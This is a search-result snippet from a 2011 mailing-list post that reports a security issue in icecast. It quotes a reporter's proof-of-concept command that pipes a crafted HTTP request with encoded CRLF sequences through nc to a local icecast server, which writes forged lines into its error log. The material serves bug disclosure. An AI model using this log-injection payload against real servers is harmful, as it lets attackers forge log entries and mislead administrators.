Displaying 1 result from an estimated 1 matches for "phunny".
Did you mean:
phunky
2011 Dec 15
2
Security issue in icecast
....net/bugs/894782
From the reporter:
"Newline injection in error.log
Running this command against an icecast2 running on 127.0.0.1...
echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%
0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%
0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%
20fserve/fserve_client_create%20req%20for%20file%
20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000
> /dev/null
...causes the following to be written to /var/log/icecast2/err...